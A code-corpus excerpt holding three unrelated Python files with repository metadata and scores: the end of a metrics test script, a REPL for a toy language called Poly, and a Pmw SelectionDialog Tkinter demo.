pred: {}".format(predicts)) logging.debug("input label: {}".format(labels)) logging.debug("input loss: {}".format(labels)) acc = Accuracy() acc.update(preds=predicts, labels=labels, losses=losses, lr=0, batch_size=1) logging.info(acc.get()) # Test MetricList metrics = MetricList(Loss(name="ce-loss"), Accuracy(topk=1, name="acc-top1"), Accuracy(topk=2, name="acc-top2"), ) metrics.update(preds=predicts, labels=labels, losses=losses, lr=0, batch_size=1) logging.info("------------") logging.info(metrics.get()) acc.get_name_value()
2.90625
3
poly/repl.py
jdanford/poly
0
16798
import sys from string import whitespace from clint.textui import puts, indent, colored from poly.common import * from poly.node import * def repl_main(args): repl = Repl("repl") repl.run() class UndefinedCommandError(PolyError): def __init__(self, command): self.message = "Undefined command '{}'".format(command) class Repl: def __init__(self, name, in_prompt=None, out_prompt=None): self.node = Node(name) if in_prompt is None: in_prompt = ">> " self.in_prompt = in_prompt if out_prompt is None: out_prompt = "\n" + " " * len(in_prompt) self.out_prompt = out_prompt try: self.node.load_module("prelude.poly", "") except ModuleError as e: self.print_error(e) def run(self): self.print_banner("Poly 0.0") while True: s, is_command = self.get_input() if is_command: try: exit = self.handle_command(s) except UndefinedCommandError as e: self.print_error(e) exit = False if exit: break else: continue try: expr = self.node.read(s) self.eval_and_print(expr) except PolyError as e: self.print_error(e) def eval_and_print(self, expr0): expr1 = self.node.eval(expr0) self.print_result(expr1) self.node.env.table["$"] = expr1 def handle_command(self, cmd): if cmd in ["q", "quit"]: return True elif cmd[0] == " ": self.print_warning(cmd[1:]) else: raise UndefinedCommandError(cmd) return False def get_input(self): while True: try: prompt = self.in_prompt puts(prompt, newline=False) s = input().strip() if empty_space(s): continue elif s[0] == ":": return s[1:], True else: return s, False except (EOFError, KeyboardInterrupt): puts() return "quit", True def print_banner(self, s, width=72): line = "-" * width puts(line) puts(s) puts(line + "\n") def print_result(self, expr): prompt = colored.blue(self.out_prompt) puts(prompt + str(expr) + "\n") def print_str(self, s): puts(s) def print_warning(self, s): sign = colored.yellow("Warning: ") puts(sign + s + "\n") def print_error(self, e): sign = colored.red("Error: ") puts(sign + e.message + "\n") def empty_space(s): if len(s) == 0: return True for c in s: if s in whitespace: return True return False if __name__ == "__main__": repl_main(sys.argv[1:])
2.8125
3
resources/mgltools_x86_64Linux2_1.5.6/lib/python2.5/site-packages/Pmw/Pmw_1_3/demos/SelectionDialog.py
J-E-J-S/aaRS-Pipeline
3
16799
title = 'Pmw.SelectionDialog demonstration' # Import Pmw from this directory tree. import sys sys.path[:0] = ['../../..'] import Tkinter import Pmw class Demo: def __init__(self, parent): # Create the dialog. self.dialog = Pmw.SelectionDialog(parent, title = 'My SelectionDialog', buttons = ('OK', 'Cancel'), defaultbutton = 'OK', scrolledlist_labelpos = 'n', label_text = 'What do you think of Pmw?', scrolledlist_items = ('Cool man', 'Cool', 'Good', 'Bad', 'Gross'), command = self.execute) self.dialog.withdraw() # Create button to launch the dialog. w = Tkinter.Button(parent, text = 'Show selection dialog', command = self.dialog.activate) w.pack(padx = 8, pady = 8) def execute(self, result): sels = self.dialog.getcurselection() if len(sels) == 0: print 'You clicked on', result, '(no selection)' else: print 'You clicked on', result, sels[0] self.dialog.deactivate(result) ###################################################################### # Create demo in root window for testing. if __name__ == '__main__': root = Tkinter.Tk() Pmw.initialise(root) root.title(title) exitButton = Tkinter.Button(root, text = 'Exit', command = root.destroy) exitButton.pack(side = 'bottom') widget = Demo(root) root.mainloop()
2.828125
3